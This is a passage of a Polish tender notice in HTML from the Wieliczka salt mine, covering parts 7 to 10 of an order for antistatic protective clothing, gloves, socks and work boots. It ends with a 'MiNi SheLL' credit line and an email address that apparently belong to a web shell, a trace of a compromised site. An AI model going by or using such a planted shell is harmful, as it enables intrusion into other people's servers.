2. Rodzaj i maksymalna ilość bluz watowych objętych przedmiotem zamówienia - 150 sztuk, wzrost od 160 cm do 200 cm
W ramach zamówienia, Zamawiający zobowiązuje się do zakupu bluz watowanych wymienionych powyżej o wartości 60% ceny całkowitej. Pozostałą część bluz watowanych, o wartości 40% ceny całkowitej Zamawiający zakupi w zależności od potrzeb (prawo opcji).
Szczegółowe warunki realizacji części VI zamówienia zawarte zostały we wzorze umowy stanowiącym załącznik nr 19 do specyfikacji, zamieszczonej na stronie internetowej Zamawiającego www.kopalniawieliczka.eu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.10.00.00-0, 18.81.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. jakość - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dostawa ubrań watowanych ochronnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa ubrań watowanych ochronnych (spodnie do pasa) o gramaturze materiału 280-300 g/m2, antyelektrostatycznych, dopuszczonych do pracy w atmosferze zagrożonej wybuchem, zwanych dalej ubraniami watowanymi.
2. Rodzaj i maksymalna ilość ubrań watowych objętych przedmiotem zamówienia - 50kpl, wzrost od 160 cm do 200 cm
W ramach zamówienia, Zamawiający zobowiązuje się do zakupu ubrań watowanych wymienionych powyżej o wartości 60% ceny całkowitej. Pozostałą część ubrań watowanych, o wartości 40% ceny całkowitej Zamawiający zakupi w zależności od potrzeb (prawo opcji).
Szczegółowe warunki realizacji części VII zamówienia zawarte zostały we wzorze umowy stanowiącym załącznik nr 20 do specyfikacji, zamieszczonej na stronie internetowej Zamawiającego www.kopalniawieliczka.eu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.10.00.00-0, 18.81.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. jakość - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Dostawa rękawic ochronnych 5-palcowych, drelichowych, wzmocnionych skórą.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa rękawic ochronnych 5 palcowych drelichowych wzmocnionych skórą (cała dłoń), antyelektrostatycznych, z dopuszczeniem do pracy  w atmosferze zagrożonej wybuchem, zwanych dalej rękawicami drelichowymi wzmocnionymi skórą.
2. Rodzaj i maksymalna ilość rękawic drelichowych wzmocnionych skórą objętych przedmiotem zamówienia - 3 000 par
W ramach zamówienia, Zamawiający zobowiązuje się do zakupu rękawic drelichowych wzmocnionych skórą wymienionych powyżej o wartości 60% ceny całkowitej. Pozostałą część rękawic drelichowych wzmocnionych skórą, o wartości 40% ceny całkowitej Zamawiający zakupi w zależności od potrzeb (prawo opcji).
Szczegółowe warunki realizacji części VIII zamówienia zawarte zostały we wzorze umowy stanowiącym załącznik nr 21 do specyfikacji, zamieszczonej na stronie internetowej Zamawiającego www.kopalniawieliczka.eu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.10.00.00-0, 18.81.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. jakość - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Dostawa skarpet przemysłowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa skarpet przemysłowych zwanych dalej skarpetami. Wyrób ten będzie stosowany w atmosferze zagrożonej wybuchem.
2. Rodzaj i maksymalna ilość skarpet objętych przedmiotem zamówienia - 1 500 par
W ramach zamówienia, Zamawiający zobowiązuje się do zakupu skarpet wymienionych powyżej o wartości 60% ceny całkowitej. Pozostałą część skarpet, o wartości 40% ceny całkowitej Zamawiający zakupi w zależności od potrzeb (prawo opcji).
Szczegółowe warunki realizacji części IX zamówienia zawarte zostały we wzorze umowy stanowiącym załącznik nr 22 do specyfikacji, zamieszczonej na stronie internetowej Zamawiającego www.kopalniawieliczka.eu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.10.00.00-0, 18.81.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. jakość - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Dostawa odzieży i obuwia roboczego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest  dostawa  odzieży i obuwia roboczego. 
2. Rodzaj i maksymalna ilość odzieży i obuwia roboczego objętego przedmiotem zamówienia:
1) Buty gumowo-filcowe robocze - 100 par, rozmiar od 39 do 50
2) Buty skórzano - filcowe robocze - 10 par, rozmiar od 39 do 50
3) Fartuch  drelichowy roboczy gramatura materiału 220-250 g/m2 - 20 sztuk, rozmiar od S do XXXL
4) Rękawice robocze 5-palcowe drelichowe - 1 000 par
5) Skarpety męskie bawełniane 100% bawełna - 1 500 par, rozmiar od 38 do 50
W ramach realizacji zamówienia, Zamawiający zobowiązuje się do zakupu odzieży i obuwia wymienionego powyżej o wartości 60% ceny całkowitej. Pozostałą część przedmiotu zamówienia, o wartości 40% ceny całkowitej Zamawiający zakupi w zależności od potrzeb (prawo opcji).
Szczegółowe warunki realizacji części X zamówienia zawarte zostały we wzorze umowy stanowiącym załącznik nr 23  do specyfikacji,  zamieszczonej na stronie internetowej Zamawiającego www.kopalniawieliczka.eu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.10.00.00-0, 18.81.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. jakość - 40</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com